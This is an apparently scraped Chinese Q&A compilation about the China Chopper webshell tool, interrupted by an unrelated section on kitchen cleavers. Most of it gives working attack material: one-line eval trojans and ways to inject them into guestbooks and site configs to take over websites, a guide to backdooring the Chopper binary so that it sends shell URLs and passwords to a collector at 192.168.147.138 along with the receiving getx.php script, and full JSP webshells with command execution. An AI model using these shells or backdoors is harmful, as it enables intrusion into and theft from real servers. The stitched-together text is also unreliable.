如何利用中国菜刀来隐藏webshell
如果不在同目录请使用跳转符号.然后修改asp文件的上传 修改时间 改成跟网站里asp文件一致就可以了.这样一般是发现不了你的shell的.因为你建特殊文件
名.带点符号文件夹.如果网站拥有者是服务器权限你这些根本无处遁形。所以还是图片的方式好.扫描程序又扫描不到。用菜刀管理起来还方便.菜刀官方好像不提供下载了.难道要收费? 这边提供一个
菜刀的下载链接 有需要的朋友去下载吧.把你们的webshell都换成一句话吧.不然你们的shell跟人家是公用的了
一句话木马怎么插和我插了一句话木马之后那个打开网址然后上传代码的网址是多少那些教程里没有说那个地址
一句话木马插入方法:第一种:先判断数据库是asp或其他格式,若为asp格式,可通过留言本向数据库插入一句话代码,插入后,用中国菜刀连接留言本数据库地址(数据库地址可以通过暴库爆出路径,暴不出路径,就用工具强行扫描,看是否能扫到数据库地址)就得到webshell了。第二种:进入网站后台,然后修改网站名,把网站名修改成一句话木马代码,记住,要闭合插入一句话,即
"%%eval request("这里换成你喜欢设的密码"%%s=" '闭合的一句话木马代码
%eval request("这里换成你喜欢设的密码"% '未闭合的一句话木马代码
有一次,我进了一个网站后台,修改网站名时,没有闭合插入一句话木马代码,致使后台出现了403错误,无法打开,白浪费了一个网站。闭合插入并保存后,用中国菜刀连接网站配置文件(配置文件路径可以通过插入未闭合的一句话木马代码,不保存,点击后台别的位置,会出现错误提示,下面的路径就是网站配置文件的路径),因为网站名等信息在网站的配置文件中,就要连接配置文件,成功后,你就得到了网站webshell了。
总之,我是这样拿站的,希望这些方法对你有用。
大家谁知道菜刀的分类?及不同的品种应如何进行使用?
从使用方面来说,菜刀大概分为三大类:以十八子菜刀为例,分为切片刀、斩切刀、砍骨刀。三大类厨刀,因为使用范围不同,外型各不相同。其中切片刀和斩切刀的刀背是直的,而砍骨刀的刀背多是有弧度的,就是说刀背的前端是翘起来的。砍骨刀在靠近刀背的最前方多半会有一个圆孔。切片刀的整张刀是一般薄厚的,一般都比较的薄;斩切刀是前端薄一些,靠近刀柄的后端则会厚一些;而砍骨刀整张刀的刀身都会比较的厚实。从重量方面来比较,切片刀最轻,砍骨刀最重,斩切刀则属于略微重一些的刀。(对于女性而言)从刀的刃口方面来说,切片刀的刃口最薄,从刀背到刃口的厚度直线递减,反射光线的时候没有明显的变形带,刀身到刃口没有明显的区分线;斩切刀的刃口比切片刀厚一点,从刀身的下方到刃口是突然递减的,刀身在反射光线的时候,靠近刀刃的上方,会有一条比较明显的变形带,这就是我所说的区分线。斩切刀的区分线以下的刃口窄一些,而且刀身背面的区分线会比较明显,刀身正面的区分线就不是很明显了。砍骨刀的刃口最厚,区分线以下的刃口也会宽一些,区分线也比斩刀明显,而且是刀身正反两面都比较明显。
切片刀是专门用来切菜、切肉、切丝、切段等等总之一切可以切的东西都可以用切片刀来切,它小而精的身材、轻巧的重量和锋利的刃口一定会让您在切东西的时候得心应手!斩切刀是斩切两用刀。用比较通俗的语言说就是,这种类型的刀,即可以用来切食物又可以用来砍骨头。刀刃的前段比较薄,类似切片刀的厚度,当然在切的方面也会有不俗的表现。刀刃比较厚的后段则适合砍一些中大类的骨头,厚实的刀身和刃口在斩骨头的方面表现不错,但比起专门的砍骨刀来,仍然略有不足。砍骨刀,不用说,当然是专门用来砍骨头的,再大再硬的骨头都应付自如。
从制做菜刀的材料来分,大概分为:三合钢、七铬钢、三铬钢和特殊合金钢。三合钢是复合刚才,是几种材料爆炸焊接而成,外层侧面采用耐蚀性优良的低碳不锈钢、中间芯部材料则是高碳合金钢,通过热处理淬火后,外层由于采用的是低碳不锈钢材料,硬度值较低,修磨起来比较省力,也比较方便。用三合钢造出的刀,好处是具有复合层保护不易崩口、卷口。中间芯部的高碳合金钢也让刀具拥有高硬度,使用起来更佳的锋利耐用。是刀具市场上非常不错的原材料。七铬钢是属于高硬度材料,七铬钢造出来的菜刀更坚硬更锋利,锋利的持久性、防锈性和韧性都很高。三铬钢就没有七铬钢那么高的硬度了,用三合钢造出的菜刀,其特点是锋利易磨且不易生锈。价格方面比前两中钢材也更平一些。特殊合金钢是一种经过锻打的钢材,硬度介于七铬钢和三铬钢之间。用特殊合金钢造出的刀,好处是锋利防锈,具有韧性不易断脆,晶粒更细、易修磨。从材料的特性来说三合钢、三铬钢的适用更广泛一些,切片刀、斩切刀和砍骨刀都适用。七铬钢和特殊合金钢更适用于斩切刀和砍骨刀。
中国菜刀是什么软件
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。
只要支持动态脚本的网站[如php/jsp/aspx/asp/cfm/ruby/cgi/python/perl等等],都可以用中国菜刀来进行管理!
常用功能:
文件管理,虚拟终端,数据库管理。
其它功能:
WEB浏览器(POST浏览/自定义COOKIE浏览/自定义JS)
网站爬行(自动保存目录结构)
网站安全扫描。
在非简体中文环境下使用,自动切换到英文界面。
用中国菜刀连接一句话木马时为何会出现加载失败问题
刀菜需要自己做变形,加载失败可能是服务器WAF拦截了,传统一句话优化看这:那些强悍的PHP一句话后门;推荐使用新技术:“冰蝎”动态二进制加密网站管理客户端,WebShell工具
使用中国菜刀怎么运行服务端的代码
服务端只需要简单的一行代码.这绝对可以排入叉叉最喜欢的十大软件排行榜。(Ps:在某些黑阔手中菜刀算得上是居家旅行,杀人越货的必备神器),究竟
如何给中国菜刀添加隐蔽后门
1、后门如何触发
这里要先讲下菜刀的后门是如何触发的,知道如何触发后门,后面按这个思路往下看会方便些。
当一句话连回目标服务器时,我们经常会在文件列表中右键查看文件,如下图
当我们执行右键-编辑文件时,我们的后门就会被触发(我们要添加的就是这样的一个隐藏后门)。
2、菜刀脱壳
在分析菜刀前,先把菜刀的壳脱掉,使用Peid可知,菜刀是UPx壳,网上找个Upx的脱壳工具即可脱壳。
3、查看数据包,分析流程(右键-编辑)
本地搭建好环境后,在菜刀中右键-编辑查看某一文件,使用burpsuite进行抓包,
数据如下
a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3Bz0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3Dz1=QzpcXHdhbXBcXHd3d1xccm9ib3RzLnR4dA%3D%3D
一共有3个参数,
a url解码后为@eval (base64_decode($_POST[z0]));
z0先url解码,在base64解码为
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|-");die();
Z1先url解码,在base64解码为
C:\\wamp\\www\\robots.txt
稍微熟悉php的人应该能看出来,这段代码就是一个读文件的php脚本,由菜刀发送到目标服务器上,然后在目标服务器上执行的。 既然代码作为字符串发送带目标服务器上,那我我们可以再字符串上添加我们想执行的代码,由菜刀一起发送过去执行。
if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}
如果我们将上这段代码作为字符串,发送到服务端执行,我们就能获得webshell的地址和密码。
4、使用OD分析
使用OD打开中国菜刀,右键搜索字符串,结果如下:
定位到php读取文的字符串处,点击进去到代码处
可知,程序时将其作为字符串,压入栈中作为参数被后续函数处理的,如果在这段字符串后加入我们的后门代码,就会被程序一块发送到服务端执行。
5、修改菜刀程序文件
由上可知,字符串的地址为0x49ba94,查看内存数据,
发现其后面已经被他字符串占用(直接查看原二进制文件结果也是如此),如果我们强制在后面添加后门字符串,就会破坏远程的某些内容。因此我们需要另外找一个空闲的大空间,将后门代码放在此处。
这里我们选取地址4841d0h的空间,转化为文件偏移即为841d0h。
将后门字符串
$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}
放到文件841d0处
打开010editor 将上述字符串复制到010editor中,
由于程序中的字符串是双字节存放的,这里我们需要将后门代码也转化为双字节的。010ditor-工具-转换
使用010editor打开菜刀程序,跳到841d0h偏移处,将转换后的字符串覆盖替换菜刀程序中相同大小的数据长度,
保存文件,这样后门字符串就被我们添加到程序中了。
6、使用OD修改程序代码
用OD打开菜刀程序,定位到第4步中字符串入栈的代码处 push 0049bae4。
0049bae4地址是修改前字符串的位置,现在我们将其改成我们添加的字符串的地质处,字符串文件偏移为841d0h,转化内存偏移为4841d0h,代码修改如下
保存修改的文件即可。
7、测试修改结果
修改文件后,我们在看看菜刀-右键编辑,抓到数据包
Z0解密后为
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));};echo("|-");die();
可见我们的后门代码也一起被发送到服务端执行了。
编写加单的getx.php接收结果,
getx.php:
?php
$getx = $_GET["caidao"];
$file = fopen("getx.txt","a+");
fwrite($file,$getx);
fwrite($file,"\r\n");
fclose($file);
?
结果如下:
8、后记
通过测试可知,对于asp,aspx跟php后门的添加相似,都可以实现。Jsp木马形式不一,实现添加后门较为困难。另外,由于后门是在服务端执行的,所以不容易被发现,本地抓包是检测不到后门的;OD中右键查看后门地址也是不能直接看到的。
如何使用JSP一句话木马和菜刀木马
相信用过一句话木马的黑阔们对中国菜刀这个程序不会感到陌生,小弟也曾使用PHP一句话木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使用Struts2框架的网站安全问题均不容乐观,中标率几乎达到了85%以上。也许一场血雨腥风的Struts2漏洞利用潮即将来临。
说了这么多废话,本文的目的是什么呢?其实只是想记录一下JSP几种后门代码啦,因为曾经找JSP菜刀马找的老辛苦了。
1、首先是JSP一句话木马和它的客户端小伙伴。(小伙伴们都惊呆了~~~)
以下是服务端,保存成one.jsp并上传至目标服务器中。
%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%
通过使用一句话木马客户端连接one.jsp木马。
将下列代码保存为html页面:
htmlheadtitleJSP一句话木马客户端/title/headdiv align=center font color=red专用JSP木马连接器/fontbrform name=get method=post服务端地址input name=url size=110 type=text brbrtextarea name=t rows=20 cols=120你提交的代码/textareabr保存成的文件名:input name=f size=30 value=shell.jspinput type=button onclick="javascript:get.action=document.get.url.value;get.submit()" value=提交 /form br服务端代码:brtextarea rows=5 cols=120%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());% /textarea /div/body
保存完成后,打开html页面,写入一句话木马服务端地址,例如http://www.cto365.com/one.jsp,写入需要的代码和保存的文件名称点击保存即可。
2、中国菜刀能用的菜刀马
本文除了对jsp一句话木马进行了说明,还提供了一个中国菜刀能用的菜刀马。
将下列代码保存为xx.jsp并上传至目标服务器,使用中国菜刀工具进行连接。
%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%%!String Pwd="cto365.com";String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}Connection GC(String s)throws Exception{String[] x=s.trim().split("rn");Class.forName(x[0].trim()).newInstance();Connection c=DriverManager.getConnection(x[1].trim());if(x.length2){c.setCatalog(x[2].trim());}return c;}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;ir.length;i++){sb.append(r[i].toString().substring(0,2));}}void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;il.length;i++){dt=new java.util.Date(l[i].lastModified());sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/t"+sT+"t"+l[i].length()+"t"+sQ+"n");}else{sF+=l[i].getName()+"t"+sT+"t"+l[i].length()+"t"+sQ+"n";}}sb.append(sF);}void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();for(int k=0;kx.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));os.write(("-"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"-").getBytes(),0,3);os.close();is.close();}void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();FileOutputStream os=new FileOutputStream(f);for(int i=0;id.length();i+=2){os.write((h.indexOf(d.charAt(i))4|h.indexOf(d.charAt(i+1))));}os.close();}void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();for(int j=0;jz.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));while((l=br.readLine())!=null){sb.append(l+"rn");}}void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();while(r.next()){sb.append(r.getString(1)+"t");}r.close();c.close();}void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);while(r.next()){sb.append(r.getString("TABLE_NAME")+"t");}r.close();c.close();}void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("rn");Connection c=GC(s);Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();for(int i=1;i=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")t");}r.close();m.close();c.close();}void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i=n;i++){sb.append(d.getColumnName(i)+"t|t");}sb.append("rn");while(r.next()){for(i=1;i=n;i++){sb.append(EC(r.getString(i),cs)+"t|t");}sb.append("rn");}r.close();}catch(Exception e){sb.append("Resultt|trn");try{m.executeUpdate(q);sb.append("Execute Successfully!t|trn");}catch(Exception ee){sb.append(ee.toString()+"t|trn");}}m.close();c.close();}%%String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);StringBuffer sb=new StringBuffer("");try{sb.append("-"+"|");if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"t");if(!s.substring(0,1).equals("/")){AA(sb);}}else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){sb.append(l+"rn");}br.close();}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"-");out.print(sb.toString());%